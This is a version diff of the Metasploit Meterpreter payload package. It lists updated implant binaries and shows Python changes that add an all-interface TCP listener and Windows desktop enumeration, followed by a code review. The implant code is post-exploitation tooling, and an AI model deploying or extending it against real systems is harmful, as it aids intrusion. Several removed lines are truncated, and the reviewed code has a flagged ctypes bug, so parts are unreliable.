metasploit-payloads 2.0.105 → 2.0.107
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/data/android/meterpreter.jar +0 -0
- data/data/android/metstage.jar +0 -0
- data/data/android/shell.jar +0 -0
- data/data/meterpreter/elevator.x64.debug.dll +0 -0
- data/data/meterpreter/elevator.x64.dll +0 -0
- data/data/meterpreter/elevator.x86.debug.dll +0 -0
- data/data/meterpreter/elevator.x86.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.py +111 -8
- data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
- data/data/meterpreter/metsrv.x64.debug.dll +0 -0
- data/data/meterpreter/metsrv.x64.dll +0 -0
- data/data/meterpreter/metsrv.x86.debug.dll +0 -0
- data/data/meterpreter/metsrv.x86.dll +0 -0
- data/data/meterpreter/screenshot.x64.debug.dll +0 -0
- data/data/meterpreter/screenshot.x64.dll +0 -0
- data/data/meterpreter/screenshot.x86.debug.dll +0 -0
- data/data/meterpreter/screenshot.x86.dll +0 -0
- data/lib/metasploit-payloads/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +2 -2
- metadata.gz.sig +0 -0
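--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz:
-  data.tar.gz:
+  metadata.gz: 3d10d21369dd0b6ba5264a4aee52e159c5e50f46cc16ecd41667f2c59a270d7a
+  data.tar.gz: 7c8c3a6e15e0fe818931966bac23b89f63e0c84f73afbf662d477a43d397fcb1
 SHA512:
-  metadata.gz:
-  data.tar.gz:
+  metadata.gz: c1ed02c18e6180bdf9fe1d63494f44ad3d8301ae24ec9fbdefca7fae136f04177f066bad5c7b259e96e3ceed4ad06c4b613f8300583d7520e4dbdc2451a0442c
+  data.tar.gz: 2bf215c24e59beb8e5198570ed321c23d96c054d3cc523c56160faee54e84d26b4f40ffca241f30fc9d08a6c4c1337e1ae225b6c63d1bcab05fe0a7fcdc2c1bf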
checksums.yaml.gz.sig
CHANGED
Binary file
|
Binary file
|
data/data/android/metstage.jar
CHANGED
Binary file
|
data/data/android/shell.jar
CHANGED
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
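--- a/data/data/meterpreter/ext_server_stdapi.py
+++ b/data/data/meterpreter/ext_server_stdapi.py
@@ -1,4 +1,5 @@
 import fnmatch
+import functools
 import getpass
 import os
 import platform
@@ -669,7 +670,11 @@ TLV_TYPE_TERMINAL_COLUMNS = TLV_META_TYPE_UINT | 2601
 ##
 TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
 TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
-
+
+TLV_TYPE_DESKTOP = TLV_META_TYPE_GROUP | 3004
+TLV_TYPE_DESKTOP_SESSION = TLV_META_TYPE_UINT | 3005
+TLV_TYPE_DESKTOP_STATION = TLV_META_TYPE_STRING | 3006
+TLV_TYPE_DESKTOP_NAME = TLV_META_TYPE_STRING | 3007
 
 ##
 # Event Log
@@ -744,6 +749,9 @@ VER_PLATFORM_WIN32s = 0x0000
 VER_PLATFORM_WIN32_WINDOWS = 0x0001
 VER_PLATFORM_WIN32_NT = 0x0002
 
+# Windows Access Controls
+MAXIMUM_ALLOWED = 0x02000000
+
 WIN_AF_INET = 2
 WIN_AF_INET6 = 23
 
@@ -1125,15 +1133,24 @@ def channel_open_stdapi_net_tcp_client(request, response):
 
 @register_function
 def channel_open_stdapi_net_tcp_server(request, response):
-
+    use_dual_stack = False
+    local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST).get('value', '')
     local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)['value']
-
-
-
-
-
+    if local_host:
+        local_address_info = getaddrinfo(local_host, local_port, socktype=socket.SOCK_STREAM, proto=socket.IPPROTO_TCP, flags=socket.AI_NUMERICHOST)
+        if not local_address_info:
+            return ERROR_FAILURE, response
+        local_address_info = local_address_info[0]
+    else:
+        local_address_info = {
+            'family': socket.AF_INET6,
+            'sockaddr': ('::', local_port, 0, 0)
+        }
+        use_dual_stack = hasattr(socket, 'IPV6_V6ONLY')
+        debug_print('[*] no local host information, binding to all available interfaces...')
+    server_sock = socket.socket(local_address_info['family'], socket.SOCK_STREAM, socket.IPPROTO_TCP)
     server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
-    if local_address_info['family'] == socket.AF_INET6 and
+    if local_address_info['family'] == socket.AF_INET6 and use_dual_stack:
         server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
     server_sock.bind(local_address_info['sockaddr'])
     server_sock.listen(socket.SOMAXCONN)
@@ -2773,6 +2790,92 @@ def stdapi_ui_get_idle_time(request, response):
     response += tlv_pack(TLV_TYPE_IDLE_TIME, idle_time)
     return ERROR_SUCCESS, response
 
+@register_function_if(has_windll)
+def stdapi_ui_desktop_enum(request, response):
+
+    response_parts = []
+    if ctypes.sizeof(ctypes.c_long) == ctypes.sizeof(ctypes.c_void_p):
+        LPARAM = ctypes.c_long
+    elif ctypes.sizeof(ctypes.c_longlong) == ctypes.sizeof(ctypes.c_void_p):
+        LPARAM = ctypes.c_longlong
+
+    DESKTOPENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
+    EnumDesktopsA = ctypes.windll.user32.EnumDesktopsA
+    EnumDesktopsA.argtypes = [ctypes.c_void_p, DESKTOPENUMPROCA, LPARAM]
+    EnumDesktopsA.restype = ctypes.c_long
+
+    WINSTAENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
+    EnumWindowStationsA = ctypes.windll.user32.EnumWindowStationsA
+    EnumWindowStationsA.argtypes = [WINSTAENUMPROCA, LPARAM]
+    EnumWindowStationsA.restype = ctypes.c_long
+
+    OpenWindowStationA = ctypes.windll.user32.OpenWindowStationA
+    OpenWindowStationA.argtypes = [ctypes.c_char_p, ctypes.c_long, ctypes.c_bool]
+    OpenWindowStationA.restype = ctypes.c_void_p
+
+    CloseWindowStation = ctypes.windll.user32.CloseWindowStation
+    CloseWindowStation.argtypes = [ctypes.c_void_p]
+    CloseWindowStation.restype = ctypes.c_long
+
+    GetCurrentProcessId = ctypes.windll.kernel32.GetCurrentProcessId
+    GetCurrentProcessId.restype = ctypes.c_ulong
+
+    GetProcAddress = ctypes.windll.kernel32.GetProcAddress
+    GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
+    GetProcAddress.restype = ctypes.c_void_p
+
+    def get_session_id(pid):
+        dwSessionId = ctypes.c_ulong(0)
+
+        ProcessIdToSessionId = ctypes.windll.kernel32.ProcessIdToSessionId
+        ProcessIdToSessionId.argtypes = [ctypes.c_ulong, ctypes.POINTER(ctypes.c_ulong)]
+        ProcessIdToSessionId.restype = ctypes.c_bool
+
+        if not ProcessIdToSessionId(ctypes.c_ulong(pid), ctypes.byref(dwSessionId)):
+            dwSessionId = ctypes.c_ulong(-1)
+
+        return dwSessionId
+
+
+    def desktop_enumdesktops_callback(response_parts, session_id, station_name, lpszDesktop, lParam):
+        if not station_name or not lpszDesktop:
+            return True
+
+        entry = bytes()
+        entry += tlv_pack(TLV_TYPE_DESKTOP_SESSION, session_id)
+        entry += tlv_pack(TLV_TYPE_DESKTOP_STATION, station_name)
+        entry += tlv_pack(TLV_TYPE_DESKTOP_NAME, lpszDesktop.decode())
+
+        response_parts.append(tlv_pack(TLV_TYPE_DESKTOP, entry))
+
+        return True
+
+    @WINSTAENUMPROCA
+    def desktop_enumstations_callback(lpszWindowStation, lParam):
+        hWindowStation = OpenWindowStationA(lpszWindowStation, False, MAXIMUM_ALLOWED)
+        if not hWindowStation:
+            return True
+
+        callback = functools.partial(desktop_enumdesktops_callback, response_parts)
+        session_id = get_session_id(GetCurrentProcessId()).value
+        station_name = lpszWindowStation.decode()
+        callback = functools.partial(desktop_enumdesktops_callback, response_parts, session_id, station_name)
+        callback = DESKTOPENUMPROCA(callback)
+        EnumDesktopsA(hWindowStation, callback, 0)
+
+        if hWindowStation:
+            CloseWindowStation(hWindowStation)
+
+        return True
+
+    success = EnumWindowStationsA(desktop_enumstations_callback, 0)
+    if not success:
+        return error_result_windows(), response
+
+    response += bytes().join(response_parts)
+
+    return ERROR_SUCCESS, response
+
 @register_function_if(has_termios and has_fcntl)
 def stdapi_sys_process_set_term_size(request, response):
     channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']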
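Review bot: The `OpenWindowStationA.argtypes` declared at new line 2813 do not match the Win32 prototype (`LPCSTR lpszWinSta, BOOL fInherit, ACCESS_MASK dwDesiredAccess`): the call at 2855 passes `False, MAXIMUM_ALLOWED` in the correct order, but the declared `[c_char_p, c_long, c_bool]` pushes the 0x02000000 access mask through `c_bool`, so the access actually requested appears to collapse to 1 (`WINSTA_ENUMDESKTOPS`) and the intent of `MAXIMUM_ALLOWED` is silently lost — declare `OpenWindowStationA.argtypes = [ctypes.c_char_p, ctypes.c_bool, ctypes.c_ulong]`, and consider requesting only `WINSTA_ENUMDESKTOPS`, the access `EnumDesktops` needs, rather than `MAXIMUM_ALLOWED`. The station handle opened at 2855 is never released if `EnumDesktopsA` raises, and the `if hWindowStation:` guard at 2866 is redundant after the early return at 2856–2857; a `try`/`finally` around the enumeration fixes both (sketch below). The first `functools.partial(...)` at 2859 is dead code, overwritten at 2862, and `GetProcAddress` (2823–2825) is bound but never used in this function. `lpszDesktop.decode()` at 2847 and `lpszWindowStation.decode()` at 2861 decode ANSI names as UTF-8 and could raise inside a ctypes callback on a non-ASCII name; an explicit `.decode('ascii', 'replace')`, or the file's existing bytes-to-str helper if it has one, would be more predictable.
```python
    @WINSTAENUMPROCA
    def desktop_enumstations_callback(lpszWindowStation, lParam):
        hWindowStation = OpenWindowStationA(lpszWindowStation, False, MAXIMUM_ALLOWED)
        if not hWindowStation:
            return True

        try:
            session_id = get_session_id(GetCurrentProcessId()).value
            station_name = lpszWindowStation.decode()
            callback = functools.partial(desktop_enumdesktops_callback, response_parts, session_id, station_name)
            callback = DESKTOPENUMPROCA(callback)
            EnumDesktopsA(hWindowStation, callback, 0)
        finally:
            # release the station handle even if the enumeration raises
            CloseWindowStation(hWindowStation)

        return True
```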
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
Binary file
|
data.tar.gz.sig
CHANGED
Binary file
|
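--- a/metadata
+++ b/metadata
@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: metasploit-payloads
 version: !ruby/object:Gem::Version
-  version: 2.0.
+  version: 2.0.107
 platform: ruby
 authors:
 - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date:
+date: 2023-01-13 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake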
metadata.gz.sig
CHANGED
Binary file
|